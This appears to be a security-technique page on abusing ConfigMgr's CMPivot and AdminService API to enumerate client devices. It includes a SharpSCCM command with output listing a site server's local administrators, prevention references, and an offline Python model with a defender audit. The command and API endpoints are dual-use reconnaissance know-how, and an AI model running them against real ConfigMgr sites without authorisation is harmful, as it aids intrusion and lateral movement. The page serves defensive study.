Query client devices via CMPivot
- Run CMPivot permission on the Collection scope
- Read permission on Collections
- Read permission on Inventory Reports
- Read permission on the SMS Scripts object (n/a after version 2107)
- The default scope (n/a after version 2107)
- Target clients require a minimum of PowerShell version 4
- Additional details: https://learn.microsoft.com/en-us/mem/configmgr/core/servers/manage/cmpivot#permissions
CMPivot is part of the ConfigMgr framework. It allows for real-time collection of data from client devices.
The data collected is based on prebuilt queries, called entities, that are available by default as part of the framework. Queries are made using the Kusto Query Language (KQL), which allows for different filters to be applied to the query results.
These queries allow CMPivot users to read data from remote client devices, including data that could be useful to an attacker, such as Windows event logs, registry values, file contents, and local Administrators group members.
The most common usage of CMPivot is through the Configuration Manager console, where we can:
- Select a target to run CMPivot against (either a single resource or a collection)
- Select a query from the left pane of the CMPivot window or enter one manually in the query pane, including any desired filters
- Run the query on the target client or collection
- Read the data returned by the target in the results pane
In the background, the data obtained from these queries is gathered either through WMI or by running a PowerShell script on the client(s) as SYSTEM.
Additionally, ConfigMgr exposes the AdminService REST API, which in turn exposes methods to perform CMPivot queries:
https://{managementPoint}/AdminService/v1.0/Device({deviceId})/AdminService.RunCMPivot
AdminService also allows for retrieving the results of our queries:
https://{managementPoint}/AdminService/v1.0/Collections('{collectionName}')/AdminService.RunCMPivot
With the required permissions, an attacker can leverage CMPivot and/or the AdminService to query data from client hosts within a ConfigMgr site.
These operations allow for enumeration of:
- Active sessions
- Registry keys and values
- Local Administrators group
- Arbitrary file contents
- Windows event logs
And a lot more. There are more than 130 queries available.
- PREVENT-9: Enforce MFA for SMS provider calls
- PREVENT-20: Block unnecessary connections to site systems
Using SharpSCCM to enumerate the local Administrators group from the ConfigMgr client with ID 16777226:
.\SharpSCCM.exe invoke admin-service -r 16777226 -q "Administrators" -sms site-sms -d 10
[+] Sending query to AdminService
[+] URL: "https://site-sms/AdminService/v1.0/Device(16777226)/AdminService.RunCMPivot"
[+] OperationId found: 16777463
[+] Attempt 1 of 5: Checking for query operation to complete
[+] URL: "https://site-sms/AdminService/v1.0/Device(16777226)/AdminService.CMPivotResult(OperationId=16777463)"
[+] 10 seconds until next attempt
[+] Attempt 2 of 5: Checking for query operation to complete
[+] URL: "https://site-sms/AdminService/v1.0/Device(16777226)/AdminService.CMPivotResult(OperationId=16777463)"
[+] 10 seconds until next attempt
[+] Successfully retrieved results from AdminService
Device: SITE-SERVER
ObjectClass: User
Name: MAYYHEM\CAS$
PrincipalSource: ActiveDirectory
----------------------------------------
Device: SITE-SERVER
ObjectClass: Group
Name: MAYYHEM\Domain Admins
PrincipalSource: ActiveDirectory
----------------------------------------
Device: SITE-SERVER
ObjectClass: User
Name: MAYYHEM\sccmadmin
PrincipalSource: ActiveDirectory
----------------------------------------
Device: SITE-SERVER
ObjectClass: User
Name: SITE-SERVER\Administrator
PrincipalSource: Local
----------------------------------------
[+] Completed execution in 00:00:21.1354974
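The exchange visible in the output above (POST to RunCMPivot, receive an OperationId, poll CMPivotResult until the client reports back) modelled in Python, followed by the kind of review a defender would run over the same "Administrators" entity output. This is an added example, not code from the original page or from SharpSCCM. The request body key InputQuery and the response shape {"value": [{"OperationId": ..., "Result": [...]}]} are assumptions; the FakeAdminService class and the sample records are constructed so the script runs offline, and a real run would replace it with an authenticated HTTPS session against the SMS Provider.

```python
import json
import time

# Constructed sample data: the same records the page's SharpSCCM output shows,
# in the JSON-like shape the AdminService is assumed to return for CMPivotResult.
SAMPLE_RECORDS = [
    {"Device": "SITE-SERVER", "ObjectClass": "User", "Name": "MAYYHEM\\CAS$", "PrincipalSource": "ActiveDirectory"},
    {"Device": "SITE-SERVER", "ObjectClass": "Group", "Name": "MAYYHEM\\Domain Admins", "PrincipalSource": "ActiveDirectory"},
    {"Device": "SITE-SERVER", "ObjectClass": "User", "Name": "MAYYHEM\\sccmadmin", "PrincipalSource": "ActiveDirectory"},
    {"Device": "SITE-SERVER", "ObjectClass": "User", "Name": "SITE-SERVER\\Administrator", "PrincipalSource": "Local"},
]


class FakeAdminService:
    """Offline stand-in for the AdminService endpoints (constructed; not the real API client).

    post() answers RunCMPivot with an OperationId; get() answers CMPivotResult with an
    empty body until `ready_after` polls have happened, which mimics the
    'Checking for query operation to complete' loop in the page's output.
    """

    def __init__(self, records, operation_id=16777463, ready_after=2):
        self.records = records
        self.operation_id = operation_id
        self.ready_after = ready_after
        self.polls = 0
        self.requests = []  # (method, url, body) log so the reader can inspect the exchange

    def post(self, url, body):
        self.requests.append(("POST", url, body))
        assert url.endswith("/AdminService.RunCMPivot")
        return {"value": [{"OperationId": self.operation_id}]}

    def get(self, url):
        self.requests.append(("GET", url, None))
        self.polls += 1
        if self.polls < self.ready_after:
            return {"value": []}  # client has not reported back yet
        return {"value": [{"OperationId": self.operation_id, "Result": list(self.records)}]}


def run_cmpivot(api, management_point, device_id, query):
    """POST the CMPivot entity/KQL to the device's RunCMPivot action and return the OperationId.
    The 'InputQuery' body key is an assumption based on how SharpSCCM drives the API."""
    url = f"https://{management_point}/AdminService/v1.0/Device({device_id})/AdminService.RunCMPivot"
    reply = api.post(url, json.dumps({"InputQuery": query}))
    return reply["value"][0]["OperationId"]


def fetch_result(api, management_point, device_id, operation_id, attempts=5, delay=0.0):
    """Poll CMPivotResult(OperationId=...) until the client has reported back; None on timeout."""
    url = (f"https://{management_point}/AdminService/v1.0/Device({device_id})"
           f"/AdminService.CMPivotResult(OperationId={operation_id})")
    for _ in range(attempts):
        reply = api.get(url)
        for entry in reply.get("value", []):
            if entry.get("OperationId") == operation_id and "Result" in entry:
                return entry["Result"]
        time.sleep(delay)
    return None


def audit_local_admins(records, tier0_groups=("Domain Admins", "Enterprise Admins")):
    """Flag records a defender would review: domain principals in a device's local
    Administrators group, with tier-0 groups and computer accounts called out separately."""
    findings = []
    for r in records:
        name = r["Name"]
        short = name.split("\\", 1)[-1]
        if r["PrincipalSource"] != "ActiveDirectory":
            continue  # built-in local accounts are expected; domain-sourced ones need review
        if r["ObjectClass"] == "Group" and short in tier0_groups:
            findings.append((r["Device"], name, "tier-0 group is local admin"))
        elif r["ObjectClass"] == "User" and short.endswith("$"):
            findings.append((r["Device"], name, "domain computer account is local admin"))
        else:
            findings.append((r["Device"], name, "domain principal is local admin"))
    return findings


def demo():
    """Run the whole exchange against the fake service and return what each step produced."""
    api = FakeAdminService(SAMPLE_RECORDS)
    op_id = run_cmpivot(api, "site-sms", 16777226, "Administrators")
    records = fetch_result(api, "site-sms", 16777226, op_id)
    return op_id, records, audit_local_admins(records)


if __name__ == "__main__":
    op_id, records, findings = demo()
    print(f"OperationId {op_id}, {len(records)} records")
    for device, name, reason in findings:
        print(f"{device}: {name} -> {reason}")
```

The audit deliberately skips the local built-in account and reports only domain-sourced members, since a tier-0 group such as Domain Admins being a local administrator on a site server is exactly the membership an attacker with CMPivot rights would look for; the same query run by defenders on a schedule gives an inventory of where that exposure exists.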
- Microsoft, CMPivot for real-time data in Configuration Manager
- Benoit Lecours, SCCM CMPivot Query Examples
- Microsoft, What is the administration service in ConfigMgr
- Diego Lomellini, Lateral Movement without Lateral Movement